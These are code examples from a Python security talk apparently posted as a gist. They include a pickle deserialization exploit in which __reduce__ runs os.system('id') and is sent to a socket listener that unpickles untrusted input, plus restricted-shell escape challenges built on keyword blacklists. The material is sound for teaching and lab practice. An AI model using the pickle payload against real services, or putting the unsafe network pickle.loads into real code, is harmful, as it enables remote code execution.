Slides and code examples from my "Pythons Sinister Secrets" presentation.
The slide deck can be downloaded here.
https://github.com/MarkBaggett/MarkBaggett/blob/master/Python's%20Sinister%20Secrets%20SlideDeck.pdf
Slides and code examples from my "Pythons Sinister Secrets" presentation.
The slide deck can be downloaded here.
https://github.com/MarkBaggett/MarkBaggett/blob/master/Python's%20Sinister%20Secrets%20SlideDeck.pdf
def getmodules(mods = "root",depth=0,path=[],verbose=False): | |
modlist = [] | |
if mods == "root": | |
mods = dict([(x,y) for (x,y) in globals().items() if str(y)[:7]=="<module"]) | |
if verbose: print(depth, "PROCESSING ALL MODULES", mods) | |
for eachname,eachmod in mods.items(): | |
if verbose: print("+"*depth, "PATH {0} CURRENT ITEM {1}".format(path,eachname)) | |
if eachname in path: | |
if verbose: print("Already have {0} in path {1}".format(eachname,path)) | |
continue | |
if verbose: print("OUTPUT :", ".".join(path+[eachname])) | |
modlist.append( ".".join(path+[eachname]) ) | |
submods = dict([(x,y) for (x,y) in eachmod.__dict__.items() if str(y).startswith("<module")]) | |
if submods: | |
if verbose: print("CALLING AGAIN FOR SUBMODS OF",eachname, submods) | |
modlist.extend(getmodules(submods,depth+1,path+[eachname], verbose=verbose)) | |
else: | |
if verbose: print("MODULE {} has no submodules.".format(eachname)) | |
return modlist | |
import sys | |
def makeobject(afunction): | |
print("Generating a function for version {}.{} (same version as this machine)".format(sys.version_info.major, sys.version_info.minor)) | |
newstr = "" | |
newstr += "def a():\n" | |
newstr += " return\n\n" | |
if sys.version_info.major == 2: | |
co = afunction.__code__ | |
if sys.version_info.minor not in [5,6,7]: | |
print("This code has not been tested on this version of python. It may not work.") | |
newstr += "a.__code__ = type(a.__code__)({0},{1},{2},{3},'{4}',{5},{6},{7},'{8}','{9}',{10},'{11}')".format( co.co_argcount, co.co_nlocals, co.co_stacksize, co.co_flags, co.co_code.encode("string_escape"),co.co_consts, co.co_names, co.co_varnames, co.co_filename, str(co.co_name), co.co_firstlineno, co.co_lnotab.encode("string_escape")) | |
elif sys.version_info.major == 3: | |
co = afunction.__code__ | |
if sys.version_info.minor not in [5]: | |
print("This code has not been tested on this version of python. It may not work.") | |
newstr += "a.__code__ = type(a.__code__)({0},{1},{2},{3},{4},{5},{6},{7},{8},'{9}','{10}',{11},{12})".format( co.co_argcount, co.co_kwonlyargcount, co.co_nlocals, co.co_stacksize, co.co_flags, co.co_code,co.co_consts, co.co_names, co.co_varnames, co.co_filename, str(co.co_name), co.co_firstlineno, co.co_lnotab) | |
else: | |
print("This version of python is not tested and may not work") | |
print(newstr) |
import pickle,socket | |
class evil(object): | |
def __reduce__(self): | |
import os | |
return (os.system, ('id',)) | |
x = evil() | |
s = socket.socket() | |
s.connect(("127.0.0.1",9000)) | |
s.send(pickle.dumps(x)) |
import pickle,socket | |
s = socket.socket() | |
s.bind(("",9000)) | |
s.listen(1) | |
client,metadata = s.accept() | |
pickle.loads(client.recv(4096)) |
import readline,code | |
def readfilter(*args,**kwargs): | |
inline = input(*args,**kwargs) | |
if any(map(lambda x:x in inline,blacklist)): | |
print("Command is forbidden!") | |
return "" | |
return inline | |
print("Challenge:Execute the 'id' command. Type CTRL-D to move on to the next challenge") | |
blacklist = ['import','eval','compile'] | |
code.interact(banner='Restricted shell #1', readfunc=readfilter) | |
print("Challenge:Execute the 'id' command. Type CTRL-D to move on to the next challenge") | |
blacklist = ['import','exec','compile'] | |
code.interact(banner='Restricted shell #2', readfunc=readfilter) | |
print("Challenge:Execute the 'id' command. Type CTRL-D to move on to the next challenge") | |
blacklist = ['import','exec','eval'] | |
code.interact(banner='Restricted shell #3', readfunc=readfilter) | |
print("Challenge:Execute the 'id' command. Type CTRL-D to move on to the next challenge") | |
blacklist = ['import','exec','eval','compile'] | |
code.interact(banner='Restricted shell #4', readfunc=readfilter) |